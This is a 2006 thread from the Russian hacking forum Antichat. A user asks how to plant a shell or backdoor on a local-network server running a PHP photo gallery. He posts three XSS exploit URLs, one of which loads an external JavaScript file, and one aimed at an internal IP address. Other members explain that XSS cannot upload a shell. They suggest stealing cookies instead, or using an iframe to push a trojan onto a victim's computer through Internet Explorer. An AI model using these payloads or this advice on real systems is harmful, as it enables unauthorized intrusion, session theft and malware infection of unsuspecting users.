Форум АНТИЧАТ - Залить шелл?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)

- - Залить шелл? (https://forum.antichat.xyz/showthread.php?t=26402)

InterAct

02.11.2006 19:52

Залить шелл?

Привет!
В локалке есть сервак под хр sp2, на нем фото галерея PHP Photo Album by John Beatty,
На енту галерею есть сплоит

http://www.example.com/photos/showimages.php?dir=<iframe%20src="C:\"%20width=400 %20height=400></iframe>
http://www.example.com//photos/showfullimage.php?dir=[dir name][spc]St[spc]Clair&image=<h1>hello</h1>
http://172.17.30.2/showfullimage.php?dir=&image=<script%20language=Ja vascript%20src=http://test/users/alex/tooltiq.js></script>
можно ли как залить на сервак шелл, бекдор, или как прочесть с помощь html, js… пхп файл на серваку?

degeneration x

02.11.2006 21:14

Никак ) Это хсс атака, а не инклюдинг.

InterAct

02.11.2006 21:27

Очень жаль (. Что самое пакостное можно сделать с этим?

nc.STRIEM

02.11.2006 23:25

Цитата:

Сообщение от InterAct

Очень жаль (. Что самое пакостное можно сделать с этим?

украсть куки если XSS в профиле! или загрузить какойнить файл на комп юзера впарив ему ссылку (правд тут есть пару нюансов)

InterAct

02.11.2006 23:58

давай сюда нюансы

nc.STRIEM

03.11.2006 00:16

Использую Xss ты можеш создать фрейм в который будет подружаться твоя страничка, собсно которая будет загружать сам файл (трой) на комп жертвы, но это возможно не во всех браузерах а конкретно в Ie, и во многом зависит от настроек юзера!

А ваше посмотри видео про XSS СКАЧАТЬ

InterAct

03.11.2006 02:06

Спасибо! Посмотрим )

Время: 00:12